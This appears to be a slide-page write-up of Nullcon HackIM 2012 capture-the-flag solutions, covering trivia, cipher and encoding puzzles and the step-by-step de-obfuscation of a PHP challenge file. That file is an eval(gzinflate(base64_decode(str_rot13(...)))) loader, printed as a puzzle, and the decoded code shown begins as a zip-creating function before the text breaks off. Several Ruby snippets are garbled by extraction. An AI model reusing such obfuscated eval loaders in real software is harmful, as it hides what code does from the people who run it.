Nullcon HackIM 2012 Solutions

1,907 views

Published on

Nullcon HackIM 2012 Writeup

Published in: Self Improvement, Technology
  • Be the first to comment

Nullcon HackIM 2012 Solutions

  1. 1. Nullcon HackIM 2012 SolutionsTrivia Level 1This operating system also refers to a 1982 science fiction film, a board game, and a song off theProdigy B-Side "What Evil Lurks"Flag: androidRef:Trivia Level 2This fictional IPv4 packet header field was proposed in RFC 3514 as a means for identifying packetswith malicious intent.Flag: evil bitReference: http://www.ietf.org/rfc/rfc3514.txtTrivia Level 3This humorous RFC of the Internet Engineering Task Force describes a communication and controlprotocol suite designed for allowing infinite numbers of monkeys with infinite numbers oftypewriters to produce the entire works of William Shakespeare.Flag: 2795Reference: http://www.ietf.org/rfc/rfc2795.txtTrivia Level 4Metasploit was originally coded for what purpose?Flag: gameReference: http://threatpost.com/en_us/blogs/qa-hd-moore-metasploit-disclosure-and-ethics-052010Trivia Level 5Released on April 1st 2003, this esoteric programming language uses spaces, tabs and linefeeds tocompose commands.Flag: whitespaceReference: http://en.wikipedia.org/wiki/Whitespace_(programming_language)
  2. 2. Crypto Level 1: Ulta PultaOexjwok -333 lauiljt bwxylexk hilyruik krbf lk yfi frzlx jekbeqaexi bwzqwxixy. ofiui yfi QB blx kixj lxiaibyueb kfwbs yfuwrgf yfi sitcwluj eh yfi frzlx jwik kwziyfexg yfly jwik xwy qailki Oexjwok, 2 CeaaGlyikClue: <!-- <img src="http://www.instablogsimages.com/images/2009/09/14/recycled-keyboard-computer-mirror1_VXLbh_24429.jpg"> -->Approach: Recycled Keyboard being the hint, it pointed to a substitution cipher. Solved it by startingwith yfi = theFlag: Windows 2000 already contains features such as the human discipline component, where thePC can send an electric shock through the keyboard if the human does something that does notplease Windows, - Bill GatesOther methods:1. http://www.blisstonia.com/software/WebDecrypto/index.php2. Reversed KeyboardCrypto Level 2: White NoiseFile: http://www.nullcon.net/challenge/data/shhhkoinahihaiApproach: Initially thought it was whitespace code. Then noticed only tabs and spaces. Wrote codeto convert them to 0 and 1.Ruby code:[clevel2]$ cat decode.rbx = getsl = x.sizei=0decoded = ""while i < l do case x[i] when print "1" decoded = decoded + "1" else print "0" decoded = decoded + "0" end i=i+1endprint "n"i=0while i < decoded.size - 8
  3. 3. j=i+7print decoded[i..j].to_i(2).chri=i+8endprint "n"[clevel2]$ cat shhhkoinahihai | ruby decode.rb010001010111001001110010011011110111001000100000010011010110010101110011011100110110000101100111011001010011101000100000010110010110111101110101011100100010000010100000110000101110011011100110111011101101111011100100110010000100000010011010111010101110011011101000010000001000010011001010010000001100001011101000010000001001100011001010110000101110011011101000010000000110001001110000011011100110111011000000100000010000110110100001100001011100100110000101100011011101000110010101110010011100110010000001100001011011100110010000100000010000110110000101101110001101111011101000010000001010010011001010111000001100101011000010111010000100000000001011011100111100100100000011011110110011000100000010110010110111101110101010001110010011001010111011001101001011011110111010101110011001000000011001100110000110110001110000011100100100000010100000110000101110011011100110111011101101111010001110011001000000010110100100000010011010101001100100000010010110100001000100001100100011011100110110001100110011000000110100Error Message: Your Password Must Be at Least 18770 Characters and Cannot Repeat Any of YourPrevious 30689 Passwords - MS KB 27630Flag: Error Message: Your Password Must Be at Least 18770 Characters and Cannot Repeat Any ofYour Previous 30689 Passwords - MS KB 276304Crypto Level 3: Base TestClue:====5JP2T6UH5JR4UKRJSZTOEEJKN2TYUMFLXKUMFHJJTJVWULRIGSTGFCZKWZVEDJVJ====Approach: Looked like Base64. Tried Base64 and Base32 Decoding. Padding in front suggested thatwe may need to reverse the string.Ruby code:def decodeb32(string)hash = { "A" => "00000", "B" => "00001", "C" => "00010", "D" => "00011", "E" => "00100", "F" => "00101", "G" => "00110", "H" => "00111", "I" => "01000", "J" => "01001", "K" => "01010", "L" => "01011", "M" => "01100", "N" => "01101", "O" => "01110",
  4. 4. "P" => "01111", "Q" => "10000", "R" => "10001", "S" => "10010", "T" => "10011", "U" => "10100", "V" => "10101", "W" => "10110", "X" => "10111", "Y" => "11000", "Z" => "11001", "2" => "11010", "3" => "11011", "4" => "11100", "5" => "11101", "6" => "11110", "7" => "11111", "=" => "0"}decoded = ""len = string.size - 1(0..len).each do |i| print hash[string[i].chr] decoded = decoded + hash[string[i].chr]endprint "n"b32 = ""(0..7).each do |s|i = swhile i < decoded.size - 8 j = i + 7 print decoded[i..j].to_i(2).chr b32 = b32 + "decoded[i..j].to_i(2).chr" i = i + 8endprint "n"endreturn b32endstring ="====5JP2T6UH5JR4UKRJSZTOEEJKN2TYUMFLXKUMFHJJTJVWULRIGSTGFCZKWZVEDJVJ===="decodeb32(string)decodeb32(string.reverse)string = "MR2W6VDSNFDWKU3JNVQWYYLOMRHGO2LUNE======"decodeb32(string)Flag: duoTriGeSimalandNgitiCrypto Level 4: ElucidateFile: http://www.nullcon.net/challenge/data/elucidate
  5. 5. Approach: Obfuscated PHP code. Using combination of manual effort, irb shell, some scripting andonline tools decoded into readable php code.[nullc0n]$ irbruby-1.9.2-p180 :001 > "x62141x73145x3664x5f144x65143x6f144x65"=> "base64_decode"Thefore after base64_decoding, we got:$d9917ccba06ba0e3ed151e1b9461ae76="x62";$sa0eb2c28ddf13a1308bf608b5281360="x65";$vbc5bd6f114377e0488d6700bf89e9bc="x66";$w67426c2c6071d5516d2011022955d36="x67";$jfc5943f5fa9c0dc0462fa41344f5a69="x6d";$r646d5905656615ba7da86edd8fd543f="x6f";$p45fdad1c8a99d58b1fe5bbec9320531="x6f";$xc4b24ab8e13eb8fec317a4d1a1d6089="x6f";$s751db252d0679f810556e50453d4462="x6f";$d5544235a898a5b2e405374fc1ed84fc="x73";$xaa4294a0bca922b2cc8b9a2789e95fa="x73";$m795646e0bf98ada9720129f542f0de9="x73";$e86bf7887c00ee12d8e91be11684d53d="x73";$d9917ccba06ba0e3ed151e1b9461ae76.="141";$sa0eb2c28ddf13a1308bf608b5281360.="162";$vbc5bd6f114377e0488d6700bf89e9bc.="151";$w67426c2c6071d5516d2011022955d36.="172";$jfc5943f5fa9c0dc0462fa41344f5a69.="144";$r646d5905656615ba7da86edd8fd543f.="142";$p45fdad1c8a99d58b1fe5bbec9320531.="142";$xc4b24ab8e13eb8fec317a4d1a1d6089.="142";$s751db252d0679f810556e50453d4462.="142";$d5544235a898a5b2e405374fc1ed84fc.="164";$xaa4294a0bca922b2cc8b9a2789e95fa.="164";$m795646e0bf98ada9720129f542f0de9.="164";$e86bf7887c00ee12d8e91be11684d53d.="164";$d9917ccba06ba0e3ed151e1b9461ae76.="x73";$sa0eb2c28ddf13a1308bf608b5281360.="x65";$vbc5bd6f114377e0488d6700bf89e9bc.="x6c";$w67426c2c6071d5516d2011022955d36.="x69";$jfc5943f5fa9c0dc0462fa41344f5a69.="x35";$r646d5905656615ba7da86edd8fd543f.="x5f";$p45fdad1c8a99d58b1fe5bbec9320531.="x5f";$xc4b24ab8e13eb8fec317a4d1a1d6089.="x5f";$s751db252d0679f810556e50453d4462.="x5f";$d5544235a898a5b2e405374fc1ed84fc.="x72";$xaa4294a0bca922b2cc8b9a2789e95fa.="x72";$m795646e0bf98ada9720129f542f0de9.="x72";$e86bf7887c00ee12d8e91be11684d53d.="x72";$d9917ccba06ba0e3ed151e1b9461ae76.="145";$sa0eb2c28ddf13a1308bf608b5281360.="147";$vbc5bd6f114377e0488d6700bf89e9bc.="145";$w67426c2c6071d5516d2011022955d36.="156";$r646d5905656615ba7da86edd8fd543f.="145";$p45fdad1c8a99d58b1fe5bbec9320531.="145";$xc4b24ab8e13eb8fec317a4d1a1d6089.="147";$s751db252d0679f810556e50453d4462.="163";$d5544235a898a5b2e405374fc1ed84fc.="137";$xaa4294a0bca922b2cc8b9a2789e95fa.="137";$m795646e0bf98ada9720129f542f0de9.="160";$e86bf7887c00ee12d8e91be11684d53d.="164";$d9917ccba06ba0e3ed151e1b9461ae76.="x36";$sa0eb2c28ddf13a1308bf608b5281360.="x5f";$vbc5bd6f114377e0488d6700bf89e9bc.="x5f";$w67426c2c6071d5516d2011022955d36.="x66";$r646d5905656615ba7da86edd8fd543f.="x6e";$p45fdad1c8a99d58b1fe5bbec9320531.="x6e";$xc4b24ab8e13eb8fec317a4d1a1d6089.="x65";$s751db252d0679f810556e50453d4462.="x74";$d5544235a898a5b2e405374fc1ed84fc.="x72";$xaa4294a0bca922b2cc8b9a2789e95fa.="x72";$m795646e0bf98ada9720129f542f0de9.="x6f";$e86bf7887c00ee12d8e91be11684d53d.="x6f";$d9917ccba06ba0e3ed151e1b9461ae76.="64";$sa0eb2c28ddf13a1308bf608b5281360.="162";$vbc5bd6f114377e0488d6700bf89e9bc.="147";$w67426c2c6071d5516d2011022955d36.="154";$r646d5905656615ba7da86edd8fd543f.="144";$p45fdad1c8a99d58b1fe5bbec9320531.="144";$xc4b24ab8e13eb8fec317a4d1a1d6089.="164";$s751db252d0679f810556e50453d4462.="141";$d5544235a898a5b2e405374fc1ed84fc.="145";$xaa4294a0bca922b2cc8b9a2789e95fa.="157";$m795646e0bf98ada9720129f542f0de9.="163";$e86bf7887c00ee12d8e91be11684d53d.="153";$d9917ccba06ba0e3ed151e1b9461ae76.="x5f";$sa0eb2c28ddf13a1308bf608b5281360.="x65";$vbc5bd6f114377e0488d6700bf89e9bc.="x65";$w67426c2c6071d5516d2011022955d36.="x61";$r646d5905656615ba7da86edd8fd543f.="x5f";$p45fdad1c8a99d58b1fe5bbec9320531.="x5f";$xc4b24ab8e13eb8fec317a4d1a1d6089.="x5f";$s751db252d0679f810556e50453d4462.="x72";$d5544235a898a5b2e405374fc1ed84fc.="x70";$xaa4294a0bca922b2cc8b9a2789e95fa.="x74";$d9917ccba06ba0e3ed151e1b9461ae76.="144";$sa0eb2c28ddf13a1308bf608b5281360.="160";$vbc5bd6f114377e0488d6700bf89e9bc.=
  6. 6. "164";$w67426c2c6071d5516d2011022955d36.="164";$r646d5905656615ba7da86edd8fd543f.="143";$p45fdad1c8a99d58b1fe5bbec9320531.="146";$xc4b24ab8e13eb8fec317a4d1a1d6089.="143";$s751db252d0679f810556e50453d4462.="164";$d5544235a898a5b2e405374fc1ed84fc.="154";$xaa4294a0bca922b2cc8b9a2789e95fa.="61";$d9917ccba06ba0e3ed151e1b9461ae76.="x65";$sa0eb2c28ddf13a1308bf608b5281360.="x6c";$vbc5bd6f114377e0488d6700bf89e9bc.="x5f";$w67426c2c6071d5516d2011022955d36.="x65";$r646d5905656615ba7da86edd8fd543f.="x6c";$p45fdad1c8a99d58b1fe5bbec9320531.="x6c";$xc4b24ab8e13eb8fec317a4d1a1d6089.="x6f";$d5544235a898a5b2e405374fc1ed84fc.="x61";$xaa4294a0bca922b2cc8b9a2789e95fa.="x33";$d9917ccba06ba0e3ed151e1b9461ae76.="143";$sa0eb2c28ddf13a1308bf608b5281360.="141";$vbc5bd6f114377e0488d6700bf89e9bc.="143";$r646d5905656615ba7da86edd8fd543f.="145";$p45fdad1c8a99d58b1fe5bbec9320531.="165";$xc4b24ab8e13eb8fec317a4d1a1d6089.="156";$d5544235a898a5b2e405374fc1ed84fc.="143";$d9917ccba06ba0e3ed151e1b9461ae76.="x6f";$sa0eb2c28ddf13a1308bf608b5281360.="x63";$vbc5bd6f114377e0488d6700bf89e9bc.="x6f";$r646d5905656615ba7da86edd8fd543f.="x61";$p45fdad1c8a99d58b1fe5bbec9320531.="x73";$xc4b24ab8e13eb8fec317a4d1a1d6089.="x74";$d5544235a898a5b2e405374fc1ed84fc.="x65";$d9917ccba06ba0e3ed151e1b9461ae76.="144";$sa0eb2c28ddf13a1308bf608b5281360.="145";$vbc5bd6f114377e0488d6700bf89e9bc.="156";$r646d5905656615ba7da86edd8fd543f.="156";$p45fdad1c8a99d58b1fe5bbec9320531.="150";$xc4b24ab8e13eb8fec317a4d1a1d6089.="145";$d9917ccba06ba0e3ed151e1b9461ae76.="x65";$vbc5bd6f114377e0488d6700bf89e9bc.="x74";$xc4b24ab8e13eb8fec317a4d1a1d6089.="x6e";$vbc5bd6f114377e0488d6700bf89e9bc.="145";$xc4b24ab8e13eb8fec317a4d1a1d6089.="164";$vbc5bd6f114377e0488d6700bf89e9bc.="x6e";$xc4b24ab8e13eb8fec317a4d1a1d6089.="x73";$vbc5bd6f114377e0488d6700bf89e9bc.="164";$vbc5bd6f114377e0488d6700bf89e9bc.="x73";$s751db252d0679f810556e50453d4462();if($jfc5943f5fa9c0dc0462fa41344f5a69($sa0eb2c28ddf13a1308bf608b5281360("x5c50x22133x3055x39101x2d132x6155x7a134x2b57x3d135x2a42x5c51","x2842x2251",$d5544235a898a5b2e405374fc1ed84fc("rn","",$vbc5bd6f114377e0488d6700bf89e9bc($e86bf7887c00ee12d8e91be11684d53d(__FILE__,"x28")))))=="x3464x6363x3665x3763x65145x6464x3770x3762x34142x32142x3870x3865x3366x3566x6164x3067"){@eval($w67426c2c6071d5516d2011022955d36($d9917ccba06ba0e3ed151e1b9461ae76($xaa4294a0bca922b2cc8b9a2789e95fa("yIIgnkcORC4eT5SRD0cho3s2WqMVXWozH4hRSSXY7B0YBDtdngd0cs+9f96rZnyjS/jj7hmZZ8+87M2sTxT1NWZoRJljzDMMXNUXppQ/rLQG89Uy+9UlsxyVrWmoGozLR7ilMhAai8gyemgw0aVKsNMFMeoj3UOjhsR6TP2Z4WVZvIzgmX9r/6j7l6mw1agjlawTPb9kZk08qlP08gXt8pxW2txJNVWt1uyqrZoOHyAjLA4Xd6lanOsZj9e3lE9Fuy4bU/mZC5KemoeKUXECwb/WHKBDPY7lz8sIiNb2VU9Wq+MfSvwmzzxnphJxlvz3XtCOsSRLmc/mUHEd5KcJUMfe1L8OjjXYn+/oSAnfxD7jKTxVNLWEmuLDzZL7omK1VavnU6kDb1C0nx7123qZguxg1v3+xVMqCZ43iJoxENOxGzaOAA5zDFxXwzMZOthn+4XYQZCC/H9lIl6iIin+/BSG0Mf9310hya7rLywnQBBV3S1/hMc8+UE9B764+Uj7aalqKA+ZlpHY/LsW+Bcz3PqUjlUMeO79bsS67a7wzYKhscgvTBp+4bF0TV2mSxTeEJzBnu8J623YhwZrQTZf94R5de1JCTAXpfLY5KVyIrk0M/bxjcFPDTzaISXHrMXb5/a0FGXHtOY1VgecMP/kmSRdCAAxk/ojrAVaJrfy+bSRPFu5MIsw1UT2RiRRIYmvsGkUC+Fj8ks5Uu76Nni47+ARaclzp4jQFIY0MkIrUFslxscIUvmcVqaeINrbpVI/unqFCWUlwirlfd9krZYM+r3k2gLeF/nv4uUmSP7Sf8/8EA0KyhkGsI7HZ/fsQ2QiGQhQ3p687p2CZ+yklj4fKEmJcfq2JQ3vaqGGBwsxkhu0F81tXcT67WlED2M5BmZ2eDq2dkLqMC6z720S66eSxPLAAunJ1jgEAKN737geMYA9xjMxqCxC"))));}$m795646e0bf98ada9720129f542f0de9($xc4b24ab8e13eb8fec317a4d1a1d6089(),"x6166x3171x3665x6162x6166x66143x66143x3071x3567x6270x3665x38144x3465x3071x3562x6665")?$r646d5905656615ba7da86edd8fd543f():$p45fdad1c8a99d58b1fe5bbec9320531();Replace all dots (‘.’) by plus (“+”) and paster in irb shell.[nullc0n]$ irbruby-1.9.2-p180 :001 > $d9917ccba06ba0e3ed151e1b9461ae76="x62";$sa0eb2c28ddf13a1308bf608b5281360="x65";$vbc5bd6f114377e0488d6700bf89e9bc="x66";$w67426c2c6071d5516d2011022955d36="x67";$jfc5943f5fa9c0dc0462fa41344f5a69="x6d";$r646d590565
  7. 7. 6615ba7da86edd8fd543f="x6f";$p45fdad1c8a99d58b1fe5bbec9320531="x6f";$xc4b24ab8e13eb8fec317a4d1a1d6089="x6f";$s751db252d0679f810556e50453d4462="x6f";$d5544235a898a5b2e405374fc1ed84fc="x73";$xaa4294a0bca922b2cc8b9a2789e95fa="x73";$m795646e0bf98ada9720129f542f0de9="x73";$e86bf7887c00ee12d8e91be11684d53d="x73";$d9917ccba06ba0e3ed151e1b9461ae76+="141";$sa0eb2c28ddf13a1308bf608b5281360+="162";$vbc5bd6f114377e0488d6700bf89e9bc+="151";$w67426c2c6071d5516d2011022955d36+="172";$jfc5943f5fa9c0dc0462fa41344f5a69+="144";$r646d5905656615ba7da86edd8fd543f+="142";$p45fdad1c8a99d58b1fe5bbec9320531+="142";$xc4b24ab8e13eb8fec317a4d1a1d6089+="142";$s751db252d0679f810556e50453d4462+="142";$d5544235a898a5b2e405374fc1ed84fc+="164";$xaa4294a0bca922b2cc8b9a2789e95fa+="164";$m795646e0bf98ada9720129f542f0de9+="164";$e86bf7887c00ee12d8e91be11684d53d+="164";$d9917ccba06ba0e3ed151e1b9461ae76+="x73";$sa0eb2c28ddf13a1308bf608b5281360+="x65";$vbc5bd6f114377e0488d6700bf89e9bc+="x6c";$w67426c2c6071d5516d2011022955d36+="x69";$jfc5943f5fa9c0dc0462fa41344f5a69+="x35";$r646d5905656615ba7da86edd8fd543f+="x5f";$p45fdad1c8a99d58b1fe5bbec9320531+="x5f";$xc4b24ab8e13eb8fec317a4d1a1d6089+="x5f";$s751db252d0679f810556e50453d4462+="x5f";$d5544235a898a5b2e405374fc1ed84fc+="x72";$xaa4294a0bca922b2cc8b9a2789e95fa+="x72";$m795646e0bf98ada9720129f542f0de9+="x72";$e86bf7887c00ee12d8e91be11684d53d+="x72";$d9917ccba06ba0e3ed151e1b9461ae76+="145";$sa0eb2c28ddf13a1308bf608b5281360+="147";$vbc5bd6f114377e0488d6700bf89e9bc+="145";$w67426c2c6071d5516d2011022955d36+="156";$r646d5905656615ba7da86edd8fd543f+="145";$p45fdad1c8a99d58b1fe5bbec9320531+="145";$xc4b24ab8e13eb8fec317a4d1a1d6089+="147";$s751db252d0679f810556e50453d4462+="163";$d5544235a898a5b2e405374fc1ed84fc+="137";$xaa4294a0bca922b2cc8b9a2789e95fa+="137";$m795646e0bf98ada9720129f542f0de9+="160";$e86bf7887c00ee12d8e91be11684d53d+="164";$d9917ccba06ba0e3ed151e1b9461ae76+="x36";$sa0eb2c28ddf13a1308bf608b5281360+="x5f";$vbc5bd6f114377e0488d6700bf89e9bc+="x5f";$w67426c2c6071d5516d2011022955d36+="x66";$r646d5905656615ba7da86edd8fd543f+="x6e";$p45fdad1c8a99d58b1fe5bbec9320531+="x6e";$xc4b24ab8e13eb8fec317a4d1a1d6089+="x65";$s751db252d0679f810556e50453d4462+="x74";$d5544235a898a5b2e405374fc1ed84fc+="x72";$xaa4294a0bca922b2cc8b9a2789e95fa+="x72";$m795646e0bf98ada9720129f542f0de9+="x6f";$e86bf7887c00ee12d8e91be11684d53d+="x6f";$d9917ccba06ba0e3ed151e1b9461ae76+="64";$sa0eb2c28ddf13a1308bf608b5281360+="162";$vbc5bd6f114377e0488d6700bf89e9bc+="147";$w67426c2c6071d5516d2011022955d36+="154";$r646d5905656615ba7da86edd8fd543f+="144";$p45fdad1c8a99d58b1fe5bbec9320531+="144";$xc4b24ab8e13eb8fec317a4d1a1d6089+="164";$s751db252d0679f810556e50453d4462+="141";$d5544235a898a5b2e405374fc1ed84fc+="145";$xaa4294a0bca922b2cc8b9a2789e95fa+="157";$m795646e0bf98ada9720129f542f0de9+="163";$e86bf7887c00ee12d8e91be11684d53d+="153";$d9917ccba06ba0e3ed151e1b9461ae76+="x5f";$sa0eb2c28ddf13a1308bf608b5281360+="x65";$vbc5bd6f114377e0488d6700bf89e9bc+="x65";$w67426c2c6071d5516d2011022955d36+="x61";$r646d5905656615ba7da86edd8fd543f+="x5f";$p45fdad1c8a99d58b1fe5bbec9320531+="x5f";$xc4b24ab8e13eb8fec317a4d1a1d6089+="x5f";$s751db252d0679f810556e50453d4462+="x72";$d5544235a898a5b2e405374fc1ed84fc+="x70";$xaa4294a0bca922b2cc8b9a2789e95fa+="x74";$d9917ccba06ba0e3ed151e1b9461ae76+="144";$sa0eb2c28ddf13a1308bf608b5281360+="160";$vbc5bd6f114377e0488d6700bf89e9bc+="164";$w67426c2c6071d5516d2011022955d36+="164";$r646d5905656615ba7da86edd8fd543f+="143";$p45fdad1c8a99d58b1fe5bbec9320531+="146";$xc4b24ab8e13eb8fec317a4d1a1d6089+="143";$s751db252d0679f810556e50453d4462+="164";$d5544235a898a5b2e405374fc1ed84fc+="154";$xaa4294a0bca922b2cc8b9a2789e95fa+="61";$d9917ccba06ba0e3ed151e1b9461ae76+="x65";$sa0eb2c28ddf13a1308bf608b5281360+="x6c";$vbc5bd6f114377e0488d6700bf89e9bc+="x5f";$w67426c2c6071d5516d2011022955d36+="x65";$r646d5905656615ba7da86edd8fd543f+="x6c";$p45fdad1c8a99d58b1fe5bbec9320531+="x6c";$xc4b24ab8e13eb8fec317a4d1a1d6089+="x6f";$d5544235a898a5b2e405374fc1e
  8. 8. d84fc+="x61";$xaa4294a0bca922b2cc8b9a2789e95fa+="x33";$d9917ccba06ba0e3ed151e1b9461ae76+="143";$sa0eb2c28ddf13a1308bf608b5281360+="141";$vbc5bd6f114377e0488d6700bf89e9bc+="143";$r646d5905656615ba7da86edd8fd543f+="145";$p45fdad1c8a99d58b1fe5bbec9320531+="165";$xc4b24ab8e13eb8fec317a4d1a1d6089+="156";$d5544235a898a5b2e405374fc1ed84fc+="143";$d9917ccba06ba0e3ed151e1b9461ae76+="x6f";$sa0eb2c28ddf13a1308bf608b5281360+="x63";$vbc5bd6f114377e0488d6700bf89e9bc+="x6f";$r646d5905656615ba7da86edd8fd543f+="x61";$p45fdad1c8a99d58b1fe5bbec9320531+="x73";$xc4b24ab8e13eb8fec317a4d1a1d6089+="x74";$d5544235a898a5b2e405374fc1ed84fc+="x65";$d9917ccba06ba0e3ed151e1b9461ae76+="144";$sa0eb2c28ddf13a1308bf608b5281360+="145";$vbc5bd6f114377e0488d6700bf89e9bc+="156";$r646d5905656615ba7da86edd8fd543f+="156";$p45fdad1c8a99d58b1fe5bbec9320531+="150";$xc4b24ab8e13eb8fec317a4d1a1d6089+="145";$d9917ccba06ba0e3ed151e1b9461ae76+="x65";$vbc5bd6f114377e0488d6700bf89e9bc+="x74";$xc4b24ab8e13eb8fec317a4d1a1d6089+="x6e";$vbc5bd6f114377e0488d6700bf89e9bc+="145";$xc4b24ab8e13eb8fec317a4d1a1d6089+="164";$vbc5bd6f114377e0488d6700bf89e9bc+="x6e";$xc4b24ab8e13eb8fec317a4d1a1d6089+="x73";$vbc5bd6f114377e0488d6700bf89e9bc+="164";$vbc5bd6f114377e0488d6700bf89e9bc+="x73";ruby-1.9.2-p180 :002 >ruby-1.9.2-p180 :003 > $s751db252d0679f810556e50453d4462 => "ob_start"ruby-1.9.2-p180 :004 > $sa0eb2c28ddf13a1308bf608b5281360 => "ereg_replace"ruby-1.9.2-p180 :005 > $jfc5943f5fa9c0dc0462fa41344f5a69 => "md5"......ruby-1.9.2-p180 :012 > $w67426c2c6071d5516d2011022955d36 => "gzinflate"ruby-1.9.2-p180 :013 > $d9917ccba06ba0e3ed151e1b9461ae76 => "base64_decode"ruby-1.9.2-p180 :021 > $xaa4294a0bca922b2cc8b9a2789e95fa => "str_rot13"And so on.Therefore:eval($w67426c2c6071d5516d2011022955d36($d9917ccba06ba0e3ed151e1b9461ae76($xaa4294a0bca922b2cc8b9a2789e95fa(‘yIIgnkcORC4eT5SRD0cho3s2WqMVXWozH4hRSSXY7B0YBDtdngd0cs+9f96rZnyjS/jj7hmZZ8+87M2sTxT1NWZoRJljzDMMXNUXppQ/rLQG89Uy+9UlsxyVrWmoGozLR7ilMhAai8gyemgw0aVKsNMFMeoj3UOjhsR6TP2Z4WVZvIzgmX9r/6j7l6mw1agjlawTPb9kZk08qlP08gXt8pxW2txJNVWt1uyqrZoOHyAjLA4Xd6lanOsZj9e3lE9Fuy4bU/mZC5KemoeKUXECwb/WHKBDPY7lz8sIiNb2VU9Wq+MfSvwmzzxnphJxlvz3XtCOsSRLmc/mUHEd5KcJUMfe1L8OjjXYn+/oSAnfxD7jKTxVNLWEmuLDzZL7omK1VavnU6kDb1C0nx7123qZguxg1v3+xVMqCZ43iJoxENOxGzaOAA5zDFxXwzMZOthn+4XYQZCC/H9lIl6iIin+/BSG0Mf9310hya7rLywnQBBV3S1/hMc8+UE9B764+Uj7aalqKA+ZlpHY/LsW+Bcz3PqUjlUMeO79bsS67a7wzYKhscgvTBp+4bF0TV2mSxTeEJzBnu8J623YhwZrQTZf94R5de1JCTAXpfLY5KVyIrk0M/bxjcFPDTzaISXHrMXb5/a0FGXHtOY1VgecMP/kmSRdCAAxk/ojrAVaJrfy+bSRPFu5MIsw1UT2RiRRIYmvsGkUC+Fj8ks5Uu76Nni47+ARaclzp4jQFIY0MkIrUFslxscIUvmcVqaeINrbpVI/unqFCWUlwirlfd9krZYM+r3k2gLeF/nv4uUmSP7Sf8/8EA0KyhkGsI7HZ/fsQ2QiGQhQ3p687p2CZ+yklj4fKEmJcfq2JQ3vaqGGBwsxkhu0F81tXcT67WlED2M5BmZ2eDq2dkLqMC6z720S66eSxPLAAunJ1jgEAKN737geMYA9xjMxqCxC’))));
  9. 9. Is decoded to:eval(gzinflate(base64_decode(str_rot13(‘yIIgnkcORC4eT5SRD0cho3s2WqMVXWozH4hRSSXY7B0YBDtdngd0cs+9f96rZnyjS/jj7hmZZ8+87M2sTxT1NWZoRJljzDMMXNUXppQ/rLQG89Uy+9UlsxyVrWmoGozLR7ilMhAai8gyemgw0aVKsNMFMeoj3UOjhsR6TP2Z4WVZvIzgmX9r/6j7l6mw1agjlawTPb9kZk08qlP08gXt8pxW2txJNVWt1uyqrZoOHyAjLA4Xd6lanOsZj9e3lE9Fuy4bU/mZC5KemoeKUXECwb/WHKBDPY7lz8sIiNb2VU9Wq+MfSvwmzzxnphJxlvz3XtCOsSRLmc/mUHEd5KcJUMfe1L8OjjXYn+/oSAnfxD7jKTxVNLWEmuLDzZL7omK1VavnU6kDb1C0nx7123qZguxg1v3+xVMqCZ43iJoxENOxGzaOAA5zDFxXwzMZOthn+4XYQZCC/H9lIl6iIin+/BSG0Mf9310hya7rLywnQBBV3S1/hMc8+UE9B764+Uj7aalqKA+ZlpHY/LsW+Bcz3PqUjlUMeO79bsS67a7wzYKhscgvTBp+4bF0TV2mSxTeEJzBnu8J623YhwZrQTZf94R5de1JCTAXpfLY5KVyIrk0M/bxjcFPDTzaISXHrMXb5/a0FGXHtOY1VgecMP/kmSRdCAAxk/ojrAVaJrfy+bSRPFu5MIsw1UT2RiRRIYmvsGkUC+Fj8ks5Uu76Nni47+ARaclzp4jQFIY0MkIrUFslxscIUvmcVqaeINrbpVI/unqFCWUlwirlfd9krZYM+r3k2gLeF/nv4uUmSP7Sf8/8EA0KyhkGsI7HZ/fsQ2QiGQhQ3p687p2CZ+yklj4fKEmJcfq2JQ3vaqGGBwsxkhu0F81tXcT67WlED2M5BmZ2eDq2dkLqMC6z720S66eSxPLAAunJ1jgEAKN737geMYA9xjMxqCxC’))));Decoding rot13, we get the equivalent as:eval(gzinflate(base64_decode(lVVtaxpBEP4rG5FEQ0pub3f2JdZIKJbmU4uEFFKL7O0LOQgqatq0pf+9s96eMalwF/ww7uzMM8+87Z2fGkG1AJMbEWywmQZZKAHKccD/eYDT89Hl+9HyfklIeJzbTbmYE7vyZuNnv8tlrztj0nIXfAZSZrbw3HBwufE6GC2M4JIMiVmtzK9e/6w7y6zj1ntwynjGCo9xMx08dyC08tKg8ckJ2gkWAIJg1hldeMbBUlNwYN4Kq6ynaBfMw9r3yR9Shl4oH/zMP5XrzbrXHKRPjo/JUXOQCL7ym8fVvAo2IH9Jd+ZsFijzmmkacuWkyim3KgPBfFEYzp/zHURq5XpWHZsr1Y8BwwKLa+/bFNaskQ7wXGkIAYJRzhYQmMY7bzX1IniaH6xQo1P0ak7123dMthkt1i3+kIZdPM43vWbkRABkTmnBNN5mQSkKjmZMBgua+4KLDMPP/U9yVy6vVva+/OFT0Zs9310uln7eYljaDOOI3F1/uZp8+HR9O764+Hw7nnydXN+MycUL/YfJ+Opm3CdHwyHZrB79ofF67n7jmLXufptiGOc+4oS0GI2zFkGrRWmOah8W623LujMeDGMs94E5qr1WPGNKcsYL5XIlVex0Z/okwpSCQGmnVFKUeZKo5/n0STKUgBL1ItrpZC/xzFEqPNNkx/bweNInWesl+oFECSh5ZVfj1HG2EvEEVLzifTxHP+Sw8xf5Hh76Aav47+NEnpymc4wDSVL0ZxVeHSfykfpVHizpIdnrVAeocIV/hadSPJHyjveysq9xeMLZ+e3x2tYrS/ai4hHzFC7Fs8/8RN0XluxTfV7UM/sfD2DvTDuD3c687c2PM+lxyw4sXRzWpsd2WD3indTTOjfkxuh0S81gKpG67JyRQ2Z5OzM2rQd2qxYdZP6m720F66rFkCYNNhaW1wtRNXA737trZLN9kwZkdPkP)));Then used http://www.tareeinternet.com/scripts/decrypt.php to decode the above and got:/*a61965a2a6fcfc0957b8658d450952f5*/?><?php functioncreate_zip($_37c4dfe05770cbe4a45d2ae9fa96a647 =array(),$_0cd4cee5d8ae33bea2a09fe4d5698e7a = ,$_63f55f63cda9be345c1ab453ec6c8ce1 = false){ if(file_exists($_0cd4cee5d8ae33bea2a09fe4d5698e7a) &&!$_63f55f63cda9be345c1ab453ec6c8ce1) { return false; } $_dc0f13e9391f28d78214c80563ebba44 =array(); if(is_array($_37c4dfe05770cbe4a45d2ae9fa96a647)) {foreach($_37c4dfe05770cbe4a45d2ae9fa96a647 as $_542895ff5fa8dcb5f39647ec91e6fe12) {if(file_exists($_542895ff5fa8dcb5f39647ec91e6fe12)) { $_dc0f13e9391f28d78214c80563ebba44[] =$_542895ff5fa8dcb5f39647ec91e6fe12; } } } if(count($_dc0f13e9391f28d78214c80563ebba44)) {$_57211b392140f8815d1037fc594eb460 = new 